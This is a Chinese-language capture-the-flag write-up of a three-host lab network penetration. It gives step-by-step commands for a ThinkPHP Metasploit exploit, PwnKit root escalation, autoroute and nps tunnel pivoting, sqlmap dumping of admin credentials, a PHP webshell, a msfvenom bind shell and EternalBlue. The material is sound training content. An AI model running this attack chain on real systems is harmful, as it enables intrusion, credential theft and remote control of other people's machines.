CTF赛三层内网渗透

前言

2019某CTF线下赛真题内网结合WEB攻防题库，涉及WEB攻击，内网代理路由等技术，每台服务器存在Flag，获取一个Flag对应一个积分，获取三个Flag结束。

第一关 Taget1_centos7

1、访问目标网页

发现是ThinkPHP架构的网页，此时就要引起注意了（v5版本），此时我想到msfconsole里面有个thinkphp模块，可以用来尝试一下

2、搜索可利用的模块

search thinkphp

3、使用模块

use 0

配置选项show options

配置完成后run起来

成功拿到meterpreter

3.1 第一个flage

3.2 第二个flag

4、开始提权

方法：系统漏洞直接提权

4.1 搜索和使用模块

post/multi/recon/local_exploit_suggester

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

此时就是root权限了

4.2拿到第三个flage

第二关 Taget1_ubuntu 64位

首先要明确一点，第二关我们的kali是不能够直接去访问的，因为第二台靶机处于的是内网环境，所以我们要通过我们拿下的第一台靶机作为跳板去访问渗透第二台靶机

1、尝试通过kali自带的代理模块

1.1 添加路由

此时我们有第一关靶机的两个不同权限的会话，我们要通过这两个任意的一个会话添加我们访问第二台靶机的路由

进入会话

sessions -i 2 

下面这个命令是在靶机上创建类似于cmd命令行格式的，带有回显的命令编辑器，方便我们输入命令

python -c "import pty;pty.spawn('/bin/bash')"

查看网段信息

我们就要用内部网段当做跳板

验证猜想

这里再ping一下百度，确认这个靶机有张网卡确实属于外部网卡

ping -c baidu.com

回到meterpreter查看路由

run autoroute -p

可以看到此时是没有路由表存在的

所以需要手动去添加

这里添加的是访问22网段的路由，命令如下

run autoroute -s 192.168.22.0/24

成功添加上路由

1.2 kali添加代理

bg退出meterpreter

搜索代理模块

search socks5_proxy		

设置本机为代理服务器

set SRVHOST 127.0.0.1

直接run，开启代理

如果开启之后就直接停止了，就很有可能是1080端口被占用了

可以使用以下命令查看端口的占用情况

netstat -antlp |grep 1080

此时还不能访问，因为还没有修改代理的配置文件

修改配置文件

vi /etc/proxychains4.conf

在这文件最下方的ProxyList中修改，如果有其他的直接注释掉

此时就可以去访问22网段了

2、使用nmap扫描22网段存活主机

因为VM虚拟机自身网卡的问题，这里进行22网段存活主机显示全部存活

nmap -sn -Pn 192.168.22.0/24

所以我们这里就不进行22网段的目标查找了，因为这里是我们自己搭建的，这里就借用一下上帝视角，直接去访问目标靶机ip

192.168.22.129

3、成功访问第二层

4、配置火狐浏览器，访问目标网页

成功访问到

这里最后还提示了有一个sql注入点

5、寻找flage和拿shell的点

使用sqlmap进行注入

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1"

开始注入

这里就发现问题了

代理超时了，这个原因就是说msf的代理模块本身就不稳定，不支持我们用工具，此时的代理已经是die掉了，所以我们就要尝试更加稳定的代理nps

6、nps代理工具的下载，安装，配置和使用

我们先关闭sql进程

ps -ef|grep sqlmap

关闭代理

nps下载地址

https://github.com/ehang-io/nps

先查看自己的kali版本，从而选择适合自己的版本

uname -a 

这里我下载到了/opt目录下

解压之后就是nps文件

安装nps

./nps install

启动nps

./nos start

检查服务开启状态

因为nps默认是8080端口

netstat -antlp |grep 8080

然后去物理机访问

192.168.38.147:8080
||
kali的ip:8080

登录成功

7、nps配置隧道

首先新增一个配置

查看客户机命令配置

然后想办法把下载的npc客户机文件上传到第一个靶机，让它成为跳板

8、上传npc客户机文件到第一个靶机

通过我们拿到的sessions

upload 

成功上传

安装客户机

输入刚刚复制的命令

./npc -server=192.168.38.147:8024 -vkey=ksqn2nsug8ls8yhd -type=tc

成功

点击隧道->新增->选择socks代理

修改配置文件为刚刚你设置的端口号

再次访问

成功了

到此为止隧道打通了

9、开始获取meterpreter

使用sqlmap开始注入

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch

这次不仅快，并且不会有超时不稳定的问题

sqlmap成功了

接下来获取后台的登录账户和密码

获取库名

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch --dbs

很明显，对我们有用的数据库是bagecms

所以我们先去获取这个数据库的所有表名

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch bagecms --tables

然后我们去获取bage_admin表里面的字段名

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch -D bagecms -T bage_admin --columns

获取字段中的内容

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch -D bagecms -T bage_admin -C username,password --dump 
获取特定的
或者是
proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch -D bagecms -T bage_admin --dump
获取整个表的字段

10、登录后台

此时要重新配置火狐浏览器，设置端口为新的代理端口才可以访问

同时的话这里有两种方案获取后台地址

10.1、通过网上查询bagecms获取后台地址

建议用谷歌语法查询

10.2、通过目标扫描查询地址（通用方法）

用物理机的direarch挂代理扫描，具体的安装方法这里我就不再赘述了

python dirsearch.py -u http://192.168.22.129 --p
roxy=scoks5://192.168.38.147:1314

11、在后台写入shell

11.1获取flag

 flag{eS3sd1IKarw}

11.2进入模块管理

写入木马

然后去访问文件

http://192.168.22.129/index.php?r=tag&666=phpinfo();

12、连接蚁剑

注意这里的蚁剑需要设置代理才能连接上目标

12.1获取flag

13、制作正向的后门文件，通过蚁剑上传到目标的靶机

msfvenom -p linux/x64/meterpreter/bind_tcp lport=6666 -f elf > /opt/dict/target2.elf

找到这个文件，通过蚁剑去上传

13.1 在kali中监听6666端口

use exploit/multi/handler

show options
set LPORT 6666
set LHOST 192.168.22.129
set payload linux/x64/meterpreter/bind_tcp

这里是监听靶机的6666端口，因为是kali发出的正向

然后run起来之后去蚁剑执行这个文件

13.2成功拿下第二个靶机

第三关 window7

用代理启动msf

再去弄一个正向的shell获得meterpreter

配置路由

查看一下

run autoroute -p

添加33网段的路由

run autoroute -s 192.168.33.0/24

搜索模块

search ms17

通过永恒之蓝获取权限即可